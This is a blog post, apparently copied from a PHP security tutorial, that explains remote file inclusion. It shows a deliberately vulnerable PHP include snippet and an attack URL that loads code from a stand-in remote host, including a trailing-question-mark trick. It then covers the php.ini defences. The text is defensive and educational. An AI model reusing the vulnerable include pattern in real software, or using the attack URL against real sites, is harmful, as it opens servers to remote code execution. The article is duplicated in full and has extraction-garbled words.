Remote File Inclusion
Remote file inclusion attacks (sometimes abbreviated RFI) is a vulnerability
many people probably do not know of, but it is a very serious issue that also
must be addressed. As the name implies, it is when remote files are included,
but what exactly does that? Let us look at an example:
<?php
$page = isset($_GET['page']) ? $_GET['page'] : 'home';
require $page . '.php';
?>This is a very basic front controller that will forward the request to whatever
file that should be responsible for that particular request.
Imagine that at http://example.com/malice.php a file exists and our script
is located at http://site.com/index.php. The attacker will do this request:
http://site.com/index.php?page=http://example.com/malice. This file will get
executed when it is included and it will a write a new file to the disk. This le
could be a shell which would allow people to execute commands to the terminal
from it as well as other things they should not bea ble to. Another thing the
attacker can do is set page to http://example.com/malice.php? (note the end-
ing question mark). That will make whatever follows it part of the query string
and therefore ignored by the server the file is getting included from. Why this is
a security issue should be pretty obvious. People should de nitely not be able
to execute whatever commands they want on our server, so how can we prevent
them?
There are a couple of php.ini directives you can use to prevent this:
allow url fopen this directive is set to on by default and it controls whether
remote les should be includable.
allow url include this directive is set to off by default and was introduced in
PHP 5.2. It controls whether the include(), require(), include once()
and require once() should be able to include remote files. In versions
below PHP 5.2 this was also controlled by allow url fopen. Furthermore,
if allow url fopen is set to offthen this directive will be ignored and set
to offas well.
Basically those two directives will enable you to set the required security
settings you will need. Again, no data that is not from the inside of your
system should be trusted. You must validate user input and ensure that people
will not enter malformed or unexpected data.
One of our other administrators, Thomas Johnson, has written a small tu-
torial about how you can use Apache to block RFI attacks called Preventing
remote file include attacks with mod rewrite. You might want to check that out
as well if you are concerned about RFI vulnerabilities.
Remote file inclusion attacks (sometimes abbreviated RFI) is a vulnerability
many people probably do not know of, but it is a very serious issue that also
must be addressed. As the name implies, it is when remote files are included,
but what exactly does that? Let us look at an example:
<?php
$page = isset($_GET['page']) ? $_GET['page'] : 'home';
require $page . '.php';
?>This is a very basic front controller that will forward the request to whatever
file that should be responsible for that particular request.
Imagine that at http://example.com/malice.php a file exists and our script
is located at http://site.com/index.php. The attacker will do this request:
http://site.com/index.php?page=http://example.com/malice. This file will get
executed when it is included and it will a write a new file to the disk. This le
could be a shell which would allow people to execute commands to the terminal
from it as well as other things they should not bea ble to. Another thing the
attacker can do is set page to http://example.com/malice.php? (note the end-
ing question mark). That will make whatever follows it part of the query string
and therefore ignored by the server the file is getting included from. Why this is
a security issue should be pretty obvious. People should de nitely not be able
to execute whatever commands they want on our server, so how can we prevent
them?
There are a couple of php.ini directives you can use to prevent this:
allow url fopen this directive is set to on by default and it controls whether
remote les should be includable.
allow url include this directive is set to off by default and was introduced in
PHP 5.2. It controls whether the include(), require(), include once()
and require once() should be able to include remote files. In versions
below PHP 5.2 this was also controlled by allow url fopen. Furthermore,
if allow url fopen is set to offthen this directive will be ignored and set
to offas well.
Basically those two directives will enable you to set the required security
settings you will need. Again, no data that is not from the inside of your
system should be trusted. You must validate user input and ensure that people
will not enter malformed or unexpected data.
One of our other administrators, Thomas Johnson, has written a small tu-
torial about how you can use Apache to block RFI attacks called Preventing
remote file include attacks with mod rewrite. You might want to check that out
as well if you are concerned about RFI vulnerabilities.
No comments:
Post a Comment